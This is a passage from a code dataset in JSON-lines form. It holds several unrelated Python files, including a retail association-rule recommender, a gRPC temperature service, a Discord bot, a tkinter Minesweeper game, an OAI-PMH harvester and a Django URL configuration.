up_limit\n\n\n##### Data Preparation\n########################## Task-1 ##########################\ndf.dropna(inplace=True) # Remove missing observations from the data set\n\ndf = df[~df[\"Invoice\"].str.contains(\"C\", na=False)] # Delete operation if it starts with C in \"Invoice\".\n\ndf = df[df[\"Quantity\"] > 0]\ndf = df[df[\"Price\"] > 0]\n\n# Functions required to delete outliers\nreplace_with_thresholds(df, \"Quantity\")\nreplace_with_thresholds(df, \"Price\")\n\ndf.head()\n\n####### Invoice-Product Matrix\n\n########################## Task-2 ##########################\n\ndf_ge = df[df[\"Country\"] == \"Germany\"]\n\ndf_ge.groupby([\"Invoice\", \"Description\"]).agg({\"Quantity\": \"sum\"})\n\n\ndf_ge.groupby([\"Invoice\", \"Description\"]).agg({\"Quantity\": \"sum\"}).unstack().fillna(0).applymap(lambda x: 1 if x > 0 else 0).iloc[0:5, 0:5].head()\n\n\n# functionalization of transactions\ndef create_invoice_product_df(dataframe, id=False):\n if id:\n return dataframe.groupby(['Invoice', \"StockCode\"])['Quantity'].sum().unstack().fillna(0).applymap(lambda x: 1 if x > 0 else 0)\n else:\n return dataframe.groupby(['Invoice', 'Description'])['Quantity'].sum().unstack().fillna(0).applymap(lambda x: 1 if x > 0 else 0)\n\n\n\nge_inv_pro_df = create_invoice_product_df(df_ge, id=True)\nge_inv_pro_df.head()\n\ndef check_id(dataframe, stock_code):\n product_name = dataframe[dataframe[\"StockCode\"] == stock_code][[\"Description\"]].values[0].tolist()\n return product_name\n\n\n\n########################## Task-3 ##########################\n\n# User 1 product id: 21987\n# User 1 product id: 23235\n# User 1 product id: 22747\n\nl = [21987, 23235, 22747]\nfor index, product in enumerate(l):\n print(\"Product Name \" + str(index) + \": \" + str(check_id(df_ge, product)))\n\n\n\n\n########################## Task-4 ##########################\n\n############# Enforcement of Association Rules\n\n# Possibilities of all possible product combinations\nfrequent_itemsets = apriori(ge_inv_pro_df, min_support=0.01, use_colnames=True)\nfrequent_itemsets.sort_values(\"support\", ascending=False).head()\n\n\n# Enforcement of Association Rules:\nrules = association_rules(frequent_itemsets, metric=\"support\", min_threshold=0.01)\nrules.sort_values(\"support\", ascending=False).head()\nrules.sort_values(\"lift\", ascending=False).head(50)\n\n\n# Product recommendation for users in the cart to be done\ndef arl_recommender(rules_df, product_id, rec_count=1):\n sorted_rules = rules_df.sort_values(\"lift\", ascending=False)\n recommendation_list = []\n\n for i, product in sorted_rules[\"antecedents\"].items():\n for j in list(product):\n if j == product_id:\n recommendation_list.append(list(sorted_rules.iloc[i][\"consequents\"]))\n\n recommendation_list = list({item for item_list in recommendation_list for item in item_list})\n\n return recommendation_list[:rec_count]\n\ncheck_id(df, 21987)\narl_recommender(rules, 21987, 3)\n\n\n########################## Task-5 ##########################\n\n# Recommended products for all users according to their product id\nfor product in l:\n print(\"Product Name \" + str(product) + \": \" + str(check_id(df_ge, product)) + \" Recommended Product: \" + str([check_id(df_ge, i) for i in arl_recommender(rules, product, 3)]))\n\n\n# with list comprehension\n[\"Product Name \" + str(product) + \": \" + str(check_id(df_ge, product)) + \" Recommended Product: \" + str([check_id(df_ge, i) for i in arl_recommender(rules, product, 3)]) for product in l]","repo_name":"mehmettuzcu/recommendation_systems","sub_path":"association_rule_learning_recommender.py","file_name":"association_rule_learning_recommender.py","file_ext":"py","file_size_in_byte":4680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"30958923407","text":"from concurrent import futures\nimport logging\n\nimport grpc\nimport EmployeeService_pb2\nimport EmployeeService_pb2_grpc\n\nall_data = [{'id':1,'date':'15/01/2023','local':'Recife','temperature':31},{'id':2,'date':'20/12/2022','local':'Salvador','temperature':28},{'id':3,'date':'22/12/2022','local':'Manaus','temperature':25},{'id':4,'date':'25/12/2022','local':'Rio de Janeiro','temperature':30},{'id':5,'date':'26/12/2022','local':'Fortaleza','temperature':32},{'id':6,'date':'27/12/2022','local':'Brasilia','temperature':15},{'id':7,'date':'01/01/2023','local':'Porto Alegre','temperature':18},{'id':8,'date':'05/01/2023','local':'Goiânia','temperature':25},{'id':9,'date':'10/01/2023','local':'Sao Paulo','temperature':20},{'id':10,'date':'15/01/2023','local':'Belo Horizonte','temperature':27}]\n\nclass TemperatureService(EmployeeService_pb2_grpc.TemperatureServiceService):\n def InsertTemperature(self, request, context):\n data = {\n 'id': request.id,\n 'date': request.date,\n 'local': request.name.local,\n 'temperature': request.temperature\n }\n all_data.append(data)\n return EmployeeService_pb2.StatusReply(status='OK')\n\n def GetTemperatureByID(self, request, context):\n usr = [item for item in all_data if (item['id'] == request.id)]\n\n return EmployeeService_pb2.Temperature(id=usr[0]['id'], date=usr[0]['date'], local=usr[0]['local'],\n temperature=usr[0]['temperature'])\n\n def GetTemperatureByDate(self, request, context):\n filtered_list = [item for item in all_data if (item['date'] == request.date)]\n list = EmployeeService_pb2.TemperatureList()\n for item in filtered_list:\n emp_date = EmployeeService_pb2.Temperature(id=item['id'], date=item['date'],\n local=item['local'],\n temperature=item['temperature'])\n list.temperature_data.append(emp_date)\n return list\n\n return EmployeeService_pb2.TemperatureList(filtered_list)\n\n def GetTemperatureByLocal(self, request, context):\n filtered_list = [item for item in all_data if (item['local'] == request.local)]\n list = EmployeeService_pb2.TemperatureList()\n for item in filtered_list:\n emp_date = EmployeeService_pb2.Temperature(id=item['id'], date=item['date'],\n local=item['local'],\n temperature=item['temperature'])\n list.temperature_data.append(emp_date)\n return list\n\n def ListAllData(self, request, context):\n list = EmployeeService_pb2.TemperatureList()\n for item in all_data:\n emp_date = EmployeeService_pb2.Temperature(id=item['id'], date=item['date'],\n local=item['local'],\n temperature=item['temperature'])\n list.temperature_data.append(emp_date)\n return list\n\n\ndef serve():\n server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))\n EmployeeService_pb2_grpc.add_TemperatureServiceService_to_server(TemperatureService(), server)\n server.add_insecure_port('[::]:50051')\n server.start()\n server.wait_for_termination()\n\n\nif __name__ == '__main__':\n logging.basicConfig()\n serve()\n","repo_name":"DistributedSystems-UFG/simple-web-server-with-grpc-arthur-vinicius","sub_path":"python/EmployeeService.py","file_name":"EmployeeService.py","file_ext":"py","file_size_in_byte":3508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"11739919730","text":"from discord.ext import commands\nfrom discord.ext.commands import Cog\nfrom discord.ext.commands import Context\nfrom discord.utils import oauth_url\nfrom discord.embeds import Embed\nfrom discord.permissions import Permissions\n\nfrom bot.bot import JeongBalBot\nfrom bot.utils.embeds import pleaseWait\n\n\nclass General(Cog):\n def __init__(self, bot: JeongBalBot) -> None:\n self.bot = bot\n\n @commands.command(name=\"초대\")\n async def invite(self, ctx: Context) -> None:\n \"\"\"\n 정발고 봇의 초대 링크를 보여줍니다.\n 인자값: `..초대`\n \"\"\"\n url = oauth_url(self.bot.user.id, permissions=Permissions(8))\n await ctx.send(embed=Embed(title=\"정발고 봇 초대 링크\", url=url))\n\n @commands.command(name=\"help\")\n async def help(self, ctx: Context) -> None:\n msg = await ctx.send(embed=pleaseWait)\n embed = Embed(title=\"명령어 목록\")\n command_list = [\n command\n for command in self.bot.commands\n if command.name not in [\"jishaku\", \"help\"]\n ]\n for command in command_list:\n embed.add_field(name=command.name, value=command.help, inline=False)\n await msg.edit(embed=embed)\n\n\ndef setup(bot: JeongBalBot) -> None:\n bot.add_cog(General(bot))\n","repo_name":"jeongbal/bot","sub_path":"bot/cogs/general.py","file_name":"general.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"37524403631","text":"\"\"\"\nNode Library for Mininet\n\nThis contains additional Node types which you may find to be useful.\n\nMettre dans /usr/lib/python2.7/dist-packages/mininet/\n\"\"\"\n\nfrom mininet.node import Node, Switch\nfrom mininet.log import setLogLevel, info\n\nclass LinuxBridge( Switch ):\n \"Linux Bridge (with optional spanning tree)\"\n\n nextPrio = 100 # next bridge priority for spanning tree\n\n def __init__( self, name, stp=False, prio=None, **kwargs ):\n \"\"\"stp: use spanning tree protocol? (default False)\n prio: optional explicit bridge priority for STP\"\"\"\n self.stp = stp\n if prio:\n self.prio = prio\n else:\n self.prio = LinuxBridge.nextPrio\n LinuxBridge.nextPrio += 1\n Switch.__init__( self, name, **kwargs )\n\n def connected( self ):\n \"Are we forwarding yet?\"\n if self.stp:\n return 'forwarding' in self.cmd( 'brctl showstp', self )\n else:\n return True\n \n def start( self, controllers ):\n self.cmd( 'ifconfig', self, 'down' )\n self.cmd( 'brctl delbr', self )\n self.cmd( 'brctl addbr', self )\n if self.stp:\n self.cmd( 'brctl setbridgeprio', self.prio )\n self.cmd( 'brctl stp', self, 'on' )\n for i in self.intfList():\n if self.name in i.name:\n self.cmd( 'brctl addif', self, i )\n self.cmd( 'ifconfig', self, 'up' )\n\n def stop( self ):\n self.cmd( 'ifconfig', self, 'down' )\n self.cmd( 'brctl delbr', self )\n\n","repo_name":"molusq/polydrive","sub_path":"SI3/S5/Architecture et Réseaux/Réseaux/Ancien/TP3/ressources/nodelib.py","file_name":"nodelib.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"5508072136","text":"from tkinter import Button, Label\r\nimport random\r\nimport settings\r\nimport ctypes\r\nimport sys\r\nimport time\r\n\r\n\r\nclass Cell:\r\n all = []\r\n cell_count_label_object = None\r\n cell_count = settings.CELL_COUNT\r\n\r\n def __init__(self, x, y, is_mine=False):\r\n self.is_mine = is_mine\r\n self.is_opened = False\r\n self.is_marked = False\r\n self.cell_button_object = None\r\n self.x = x\r\n self.y = y\r\n Cell.all.append(self)\r\n\r\n def create_btn_object(self, frame):\r\n btn = Button(\r\n frame,\r\n width=7,\r\n height=3,\r\n # text=f'{self.x},{self.y}'\r\n )\r\n btn.bind('', self.left_click_actions)\r\n btn.bind('', self.right_click_actions)\r\n self.cell_button_object = btn\r\n\r\n @staticmethod\r\n def create_cell_count_label(frame):\r\n lbl = Label(\r\n frame,\r\n text=f\"Cells Left:{Cell.cell_count}\",\r\n width=12,\r\n height=4,\r\n bg='dark gray',\r\n fg='white',\r\n font=(\"calibri\", 18)\r\n )\r\n Cell.cell_count_label_object = lbl\r\n\r\n def left_click_actions(self, event):\r\n if self.is_mine:\r\n self.show_mine()\r\n else:\r\n if self.surrounded_cells_mines_length == 0:\r\n for c in self.surrounded_cells:\r\n c.show_cell()\r\n self.show_cell()\r\n if Cell.cell_count == settings.NR_MINES:\r\n ctypes.windll.user32.MessageBoxW(\r\n 0,\r\n 'Congratulations! You won the game!',\r\n 'YOW WON',\r\n 0\r\n )\r\n sys.exit()\r\n\r\n def get_cell_by_axis(self, x, y):\r\n for c in Cell.all:\r\n if c.x == x and c.y == y:\r\n return c\r\n\r\n @property # read only\r\n def surrounded_cells(self):\r\n cells = [\r\n self.get_cell_by_axis(self.x - 1, self.y - 1),\r\n self.get_cell_by_axis(self.x - 1, self.y),\r\n self.get_cell_by_axis(self.x - 1, self.y + 1),\r\n self.get_cell_by_axis(self.x, self.y - 1),\r\n self.get_cell_by_axis(self.x + 1, self.y - 1),\r\n self.get_cell_by_axis(self.x + 1, self.y),\r\n self.get_cell_by_axis(self.x + 1, self.y + 1),\r\n self.get_cell_by_axis(self.x, self.y + 1)\r\n ]\r\n cells = [x for x in cells if x is not None]\r\n return cells\r\n\r\n @property # read only\r\n def surrounded_cells_mines_length(self):\r\n counter = 0\r\n for x in self.surrounded_cells:\r\n if x.is_mine:\r\n counter += 1\r\n return counter\r\n\r\n def show_cell(self):\r\n if not self.is_opened:\r\n Cell.cell_count -= 1\r\n self.cell_button_object.configure(\r\n text=f'{self.surrounded_cells_mines_length}',\r\n background='SystemButtonFace'\r\n )\r\n if Cell.cell_count_label_object:\r\n Cell.cell_count_label_object.configure(\r\n text=f\"Cells Left:{Cell.cell_count}\"\r\n )\r\n self.is_opened = True\r\n\r\n def show_mine(self):\r\n # self.cell_button_object.configure(bg='red')\r\n Cell.cell_count_label_object.configure(\r\n text=f\"###############\"\r\n )\r\n ctypes.windll.user32.MessageBoxW(\r\n 0,\r\n 'You clicked on a mine',\r\n 'GAME OVER',\r\n 0\r\n )\r\n sys.exit()\r\n\r\n def right_click_actions(self, event):\r\n if not self.is_marked and not self.is_opened:\r\n self.cell_button_object.configure(bg='orange')\r\n self.is_marked = True\r\n else:\r\n self.cell_button_object.configure(bg='SystemButtonFace')\r\n self.is_marked = False\r\n if self.is_opened:\r\n self.is_marked = False\r\n\r\n @staticmethod\r\n def random_mines():\r\n picked_cells = random.sample(\r\n Cell.all,\r\n settings.NR_MINES\r\n )\r\n print(picked_cells)\r\n for picked_cell in picked_cells:\r\n picked_cell.is_mine = True\r\n\r\n def __repr__(self):\r\n return f'Cell({self.x},{self.y})'\r\n","repo_name":"bogdiz/Minesweeper","sub_path":"cell.py","file_name":"cell.py","file_ext":"py","file_size_in_byte":4248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"35959418054","text":"import os, pytz\nfrom django.core.files.storage import default_storage\nfrom django.db.models import FileField\n\nfrom datetime import datetime\nfrom django.utils import timezone\nfrom datetime import timezone as tz\n# Adapted from file cleanup function created by Tim Kamanin at https://timonweb.com/django/cleanup-files-and-images-on-model-delete-in-django/\ndef file_cleanup(sender, **kwargs):\n \"\"\"\n File cleanup callback used to emulate the old delete\n behavior using signals. Initially django deleted linked\n files when an object containing a File/ImageField was deleted.\n\n Usage:\n >>> from django.db.models.signals import post_delete\n >>> post_delete.connect(file_cleanup, sender=MyModel, dispatch_uid=\"mymodel.file_cleanup\")\n \"\"\"\n\n for field in sender._meta.get_fields():\n\n fieldname = field.name\n if field and isinstance(field, FileField):\n inst = kwargs[\"instance\"]\n f = getattr(inst, fieldname)\n m = inst.__class__._default_manager\n if (\n hasattr(f, \"path\")\n and os.path.exists(f.path)\n and not m.filter(\n **{\"%s__exact\" % fieldname: getattr(inst, fieldname)}\n ).exclude(pk=inst._get_pk_val())\n ):\n try:\n default_storage.delete(f.path)\n except:\n pass\n\n# makes the inputs of forms timezone aware and converts them from local time to UTC to maintain database uniformity\ndef apply_tz_offset(date, time):\n\n # for some reason there is discrepancy between this time converted to UTC and the inputted time\n # (eg: time inputted from Americas/St. Lucia gets 24 minutes added to it). This might be part of daylight savings\n if date and time:\n this_datetime = datetime.combine(date, time)\n std_time = this_datetime.astimezone(tz.utc)\n print(std_time.date(), std_time.time())\n return std_time","repo_name":"TheLostHermit/MIM3","sub_path":"MIM3/Forum/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"21054033975","text":"import boto3\n\n# Crea un cliente de Route53\nroute53_client = boto3.client('route53')\n\n# Define los parámetros del registro\nhosted_zone_id = 'Z02608501GXHZ4F42FBXM'\n#record_name = 'test.reno.poc.vficloud.net'\nvalue = '10.0.0.2'\n\nrecords_to_modify = [\n {\n 'record_name': 'test.reno.poc.vficloud.net',\n 'elb_arn': value\n },\n {\n 'record_name': 'test1.reno.poc.vficloud.net',\n 'elb_arn': value\n }\n]\n\nfor record in records_to_modify:\n # Crea el registro con la política de enrutamiento ponderado\n change_batch = {\n 'Comment': 'Creando un registro con enrutamiento ponderado',\n 'Changes': [\n {\n 'Action': 'CREATE',\n 'ResourceRecordSet': {\n 'Name': record['record_name'],\n 'Type': 'A',\n 'TTL': 300,\n 'ResourceRecords': [\n {\n 'Value': value\n }\n ]\n }\n }\n ]\n }\n\n # Crea los registros en Route53\n response = route53_client.change_resource_record_sets(\n HostedZoneId=hosted_zone_id,\n ChangeBatch=change_batch\n )\n\n print(f'Registro {record[\"record_name\"]} creado exitosamente.')\n","repo_name":"israel870730/python3","sub_path":"Boto3/Route53/1.1-CreateRecords-ResourceRecords.py","file_name":"1.1-CreateRecords-ResourceRecords.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"7833867508","text":"import os\nimport time\nimport re\nimport yaml\nimport sys\nfrom colorama import Fore, Style\nimport requests\nfrom typing import List, Union\nfrom requests.adapters import HTTPAdapter\nfrom urllib3.util.retry import Retry\nimport urllib\nfrom lxml import etree\n\nURLREGEX = r\"https?:\\/\\/(www\\.)?[-a-zA-Z0-9@:%._\\+~#=]{1,256}\\.[a-zA-Z0-9()]{1,6}\\b([-a-zA-Z0-9()@:%_\\+.~#?&//=]*)\"\n\n\ndef interactiveMode(session):\n userInput = \"bad\"\n while userInput == \"bad\":\n howTostart = input(\n \"Bitte wählen Sie eine Option:\\n\\n- [N]ormales Harvesting\\n- Harvesting von Records per [I]D-File\\n- Harvesten von Identifiern fortsetzen mit einem [R]esumptionToken\\n- Anzeige aller auf der Schnittstelle vorhandener [S]ets\\n- Programm verlassen mit [E]xit\\n => \"\n )\n if howTostart == \"N\":\n userInput = \"good\"\n resumptiontoken = None\n idfile = None\n baseurl = input(\"Base-URL: \")\n validurl = re.search(URLREGEX, baseurl)\n # https://regex101.com/r/2CCthx/1\n while validurl is None:\n baseurl = input(\"Bitte geben Sie eine valide Base-URL ein: \")\n validurl = re.search(URLREGEX, baseurl)\n mprefix = input(\"Metadata Prefix: \")\n while mprefix == \"\":\n mprefix = input(\"Metadata Prefix: \")\n datengeber = input(\"Datengeber: \")\n if datengeber == \"\":\n datengeber = time.strftime(\"%Y%m%d%H%M%S\")\n outputfolder = input(\"Ordner in den geharvestet werden soll: \")\n if outputfolder == \"\":\n outputfolder = os.getcwd()\n oaiset = input(\"Set(s) kommagetrennt ohne Leerzeichen: \")\n if oaiset == \"\":\n oaiset = None\n else:\n oaiset = oaiset.split(\",\")\n fromdate = input(\"Fromdate: \")\n if fromdate == \"\":\n fromdate = None\n untildate = input(\"Untildate: \")\n if untildate == \"\":\n untildate = None\n numberofprocesses = input(\"Anzahl an parallelen Downloads (default: 16): \")\n if numberofprocesses == \"\":\n numberofprocesses = 16\n else:\n numberofprocesses = int(numberofprocesses)\n elif howTostart == \"I\":\n userInput = \"good\"\n resumptiontoken = None\n fromdate = None\n untildate = None\n idfile = input(\"idfile: \")\n while idfile == \"\":\n idfile = input(\"Bitte geben Sie eine valide ID-Datei an: \")\n while os.path.exists(idfile) == False:\n print(\"-> Die ID Datei konnte nicht geladen werden\")\n idfile = input(\n f\"Bitte geben Sie den Pfad zu einer validen ID-Datei an (relativ zum aktuellen Pfad '{os.getcwd()}' oder absolut): \"\n )\n # baseurl und prefix aus der id-Datei auslesen weil die ja jetzt YAML ist und Metadaten enthält\n try:\n # Wir parsen das IDfile später nochmal, daher hier nur die ersten Zeilen (falls das ID File zu groß ist)\n ymlfile = open(idfile, \"r\", encoding=\"utf-8\")\n lines = ymlfile.read().splitlines()[2:5]\n baseurl = re.sub(r\"\\/\\s$\", \"\", lines[0].split(\": \")[1])\n oaiset = lines[1].split(\": \")[1]\n mprefix = lines[2].split(\": \")[1]\n except:\n sys.exit(\"Konnte YAML Datei nicht laden\")\n validurl = re.search(URLREGEX, baseurl)\n while validurl is None:\n baseurl = input(\"Bitte geben Sie eine valide Base-URL ein: \")\n validurl = re.search(URLREGEX, baseurl)\n while mprefix == \"\":\n mprefix = input(\"Metadata Prefix: \")\n datengeber = input(\"Datengeber: \")\n if datengeber == \"\":\n datengeber = time.strftime(\"%Y%m%d%H%M%S\")\n outputfolder = input(\"Ordner in den geharvestet werden soll: \")\n if outputfolder == \"\":\n outputfolder = os.getcwd()\n numberofprocesses = input(\"Anzahl an parallelen Downloads (default: 16): \")\n if numberofprocesses == \"\":\n numberofprocesses = 16\n else:\n numberofprocesses = int(numberofprocesses)\n elif howTostart == \"R\":\n userInput = \"good\"\n idfile = None\n oaiset = None\n fromdate = None\n untildate = None\n baseurl = input(\"Base-URL: \")\n validurl = re.search(URLREGEX, baseurl)\n while validurl is None:\n baseurl = input(\"Bitte geben Sie eine valide Base-URL ein: \")\n validurl = re.search(URLREGEX, baseurl)\n mprefix = input(\"Metadata Prefix: \")\n while mprefix == \"\":\n mprefix = input(\"Metadata Prefix: \")\n resumptiontoken = input(\"Resumption Token: \")\n while resumptiontoken == \"\":\n resumptiontoken = input(\"Resumption Token: \")\n datengeber = input(\"Datengeber: \")\n if datengeber == \"\":\n datengeber = time.strftime(\"%Y%m%d%H%M%S\")\n outputfolder = input(\"Ordner in den geharvestet werden soll: \")\n if outputfolder == \"\":\n outputfolder = os.getcwd()\n numberofprocesses = input(\"Anzahl an parallelen Downloads (default: 16): \")\n if numberofprocesses == \"\":\n numberofprocesses = 16\n else:\n numberofprocesses = int(numberofprocesses)\n elif howTostart == \"S\":\n userInput = \"good\"\n baseurl = input(\"Base-URL: \")\n validurl = re.search(URLREGEX, baseurl)\n while validurl is None:\n baseurl = input(\"Bitte geben Sie eine valide Base-URL ein: \")\n validurl = re.search(URLREGEX, baseurl)\n getInfos(baseurl, session)\n elif howTostart == \"E\":\n sys.exit(\"Programm beendet.\")\n else:\n userInput = \"bad\"\n print(\n \"\\n-> Die Eingabe wurde nicht verstanden, geben Sie bitte entweder die Großbuchtsaben N, I, S oder R ein oder E zum Beenden des Programms.\"\n )\n\n timeout = input(\"Timeout in Sekunden: \")\n if timeout == \"\":\n timeout = 0\n else:\n timeout = timeout\n debug = False\n configmode = False\n\n return (\n baseurl,\n mprefix,\n datengeber,\n oaiset,\n fromdate,\n untildate,\n idfile,\n resumptiontoken,\n float(timeout),\n debug,\n configmode,\n outputfolder,\n numberofprocesses,\n )\n\n\ndef getInfos(baseurl, session):\n # baseurl Parameter löschen, falls fälschlicherweise übergeben\n baseurl = re.sub(r\"(\\?.+)\", \"\", baseurl)\n try:\n session.get(baseurl, verify=False, timeout=(20, 80))\n except requests.exceptions.HTTPError:\n input(\n f\"--------------------------------------\\n{Fore.RED}Fehlermeldung:\\n {Style.DIM}Die Schnittstelle ist nicht erreichbar.\\n{Style.RESET_ALL}Drücken Sie Enter zum Beenden...\"\n )\n if input != \"\":\n print(\"Die Schnittstelle ist nicht erreichbar. Breche ab.\")\n sys.exit()\n except requests.exceptions.ConnectionError:\n input(\n f\"--------------------------------------\\n{Fore.RED}Fehlermeldung:\\n {Style.DIM}Die Schnittstelle ist nicht erreichbar.\\n{Style.RESET_ALL}Drücken Sie Enter zum Beenden...\"\n )\n if input != \"\":\n sys.exit()\n else:\n pass\n # leeres Dictionary aufmachen\n sets = {}\n prefixes = []\n\n def getSets(url):\n\n response = session.get(url, verify=False, timeout=(20, 80))\n try:\n response.headers[\"Content-Type\"]\n except:\n pass\n else:\n if \"xml\" not in response.headers[\"Content-Type\"]:\n print(\n f\"Abruf der OAI-Sets: Wahrscheinlich kein valides XML im Return der Schnittstelle ({url}) (Content-Type ohne XML)\"\n )\n namespaces = {\"oai\": \"http://www.openarchives.org/OAI/2.0/\"}\n errors = re.findall(r\"error\\scode=['\\\"](.+)['\\\"]>(.*)<\\/error\", response.text)\n if errors:\n print(f\"Fehler: {errors[0][0]} Abbruch.\")\n input(\n f\"{Fore.RED} Fehler: {Style.DIM} {errors[0][0]} {Style.RESET_ALL} \\n--------------------------------------\\nDrücken Sie Enter zum Beenden...\"\n )\n if input != \"\":\n sys.exit()\n else:\n try:\n root = etree.XML(response.content)\n lmxlsets = root.findall(f\".//oai:set\", namespaces)\n for s in lmxlsets:\n spec = s.findall(f\".//oai:setSpec\", namespaces)[0].text\n name = s.findall(f\".//oai:setName\", namespaces)[0].text\n if spec and name != None:\n if name in sets:\n # print(f\"Set '{name}' mehr als einmal auf der Schnittstelle angegeben\")\n pass\n else:\n sets[name] = spec\n else:\n pass\n\n # ResumptionTokens\n\n token = root.findall(f\".//oai:resumptionToken\", namespaces)\n try:\n token = token[0].text\n except:\n pass\n else:\n # URL encode den resumptionToken (siehe https://gitlab.gwdg.de/maps/harvester/-/issues/25)\n if token:\n urllib.parse.quote_plus(token)\n nexturl = (\n re.sub(r\"&resumptionToken=.+\", \"\", url)\n + \"&resumptionToken=\"\n + token\n )\n getSets(nexturl)\n except etree.XMLSyntaxError as e:\n print(\n f\"Fehler beim ermitteln der OAI Sets. Syntaxfehler im Return: {e}\"\n )\n pass\n\n def getprefixes(baseurl):\n\n url = baseurl + \"?verb=ListMetadataFormats\"\n response = session.get(url, verify=False, timeout=(20, 80))\n try:\n response.headers[\"Content-Type\"]\n except:\n pass\n else:\n if \"xml\" not in response.headers[\"Content-Type\"]:\n print(\n f\"Abruf der OAI-Metadaten-Prefixe: Wahrscheinlich kein valides XML im Return der Schnittstelle ({url}) (Content-Type ohne XML)\"\n )\n for prefix in re.findall(\n r\"(.*?)<\\/metadataPrefix>\", response.text\n ):\n prefixes.append(prefix)\n if len(prefixes) > 0:\n print(\n f\"--------------------------------------\\nAuf der Schnittstelle {baseurl} sind folgende Metadaten-Prefixe registriert: \\n--------------------------------------\"\n )\n for i in sorted(prefixes):\n print(i)\n else:\n print(\n f\"--------------------------------------\\nFür die Schnittstelle {baseurl} konnten keine Metadaten-Prefixe ermittelt werden.\\n--------------------------------------\"\n )\n\n getprefixes(baseurl)\n getSets(baseurl + \"?verb=ListSets\")\n\n if len(sets) != 0:\n print(\n \"--------------------------------------\\nAuf der Schnittstelle sind folgende Sets [setspec] vorhanden: \\n--------------------------------------\"\n )\n for key in sorted(sets.keys(), key=lambda x: x.lower()):\n print(f\"{key} [{sets[key]}]\")\n input(\n \"--------------------------------------\\nDrücken Sie Enter zum Beenden...\"\n )\n if input != \"\":\n sys.exit()\n else:\n input(\n \"--------------------------------------\\nKeine Sets gefunden, ist die URL korrekt? Drücken Sie Enter zum Beenden...\"\n )\n if input != \"\":\n sys.exit()\n","repo_name":"Deutsche-Digitale-Bibliothek/ddblabs-ometha","sub_path":"ometha/tui.py","file_name":"tui.py","file_ext":"py","file_size_in_byte":12156,"program_lang":"python","lang":"de","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"406468156","text":"\"\"\"house_app URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/4.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\n\nfrom django.contrib import admin\nfrom django.urls import path, include\n# from house_app_users import urls as houseAppURLs\n# from house_app import house_app_users\n# from administration import views\nfrom users.views import signup, signin, signout, users,UserInfoListView,UserInfoDetailView, UserInfoView,UserInfoDetailsView,UserViewSet\nfrom pages.views import home_view\nfrom rooms.views import RoomAssignDetailView,RoomListView, RoomsView, RoomsAssignView,TenantRoomView,JoinRoomView, MonthlyTenantView, show\nfrom expenses.views import UtilitiesView, MonthlyDueView, TotalDuePerMonthView, MonthlyDuePerTenantView,TotalDuePerMonthDetailView, MonthlyTotalView, monthlydues\nfrom credits.views import CreditView, OtherCreditView\nfrom accounts.views import AccountView,AccountDetailView\n\nfrom house_app_users.views import MyTokenObtainPairView, RegisterView, testEndPoint, MyTokenRefresh\n\nfrom rest_framework import routers\nfrom rest_framework_simplejwt.views import (\n TokenRefreshView,\n)\n\nrouter = routers.DefaultRouter()\n# router.register(r'login', UserViewSet, 'login')\nrouter.register(r'users', UserInfoView, basename='users')\n# router.register(r'users/', UserInfoDetailsView, 'user')\nrouter.register(r'rooms', RoomsView, 'rooms')\nrouter.register(r'roomassign', RoomsAssignView, 'roomassign')\nrouter.register(r'joinroom', JoinRoomView, 'joinroom')\nrouter.register(r'tenant', TenantRoomView, 'tenant')\nrouter.register(r'expenses', UtilitiesView, 'expenses')\nrouter.register(r'monthlytenant', MonthlyTenantView, 'monthly_tenant')\nrouter.register(r'monthlydue', MonthlyDueView, 'monthly_due')\nrouter.register(r'totalduepermonth', TotalDuePerMonthView, 'total_monthly_due')\nrouter.register(r'duepertenant', MonthlyDuePerTenantView, 'total_monthly_due_per_Tenant')\nrouter.register(r'credits', CreditView, 'credits')\nrouter.register(r'othercredit', OtherCreditView, 'othercredit')\nrouter.register(r'accounts', AccountView, 'accounts')\nrouter.register(r'monthlytotal', MonthlyTotalView, 'monthly_total')\n# router.register(r'token', MyTokenObtainPairView, 'token_obtain_pair'),\nrouter.register(r'token/refresh', MyTokenRefresh, 'token_refresh'),\nrouter.register(r'register', RegisterView, 'auth_register')\n# router.register(\n# r'token', MyTokenObtainPairView, basename=\"token\")\n\n\nadditional_routes = [\n 'token/',\n 'register/',\n 'token/refresh/'\n]\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n # path('api/', include(houseAppURLs.urlpatterns)),\n path('api/', include(router.urls)),\n path('api/token/', MyTokenObtainPairView.as_view(), name='token_obtain_pair'),\n # path('api/token/refresh/', TokenRefreshView.as_view(), name='token_refresh'),\n # path('api/register/', RegisterView.as_view(), name='auth_register'),\n path('api/test/', testEndPoint, name='test'),\n path('', home_view, name='home'),\n path('home/', home_view, name='home'),\n # path('users/', include('users.urls')),\n path('users/', users),\n path('users/signup/', signup, name='signup'),\n path('users/signin/', signin, name='login'),\n path('users/signout/', signout, name='logout'),\n path('', UserInfoListView.as_view(), name='userinfo-list'),\n path('users//', UserInfoDetailView.as_view(), name='userinfo-detail'),\n path('rooms/', RoomListView.as_view(), name='room-list'),\n path('rooms/show', show, name='show'),\n path('rooms//', RoomAssignDetailView.as_view(), 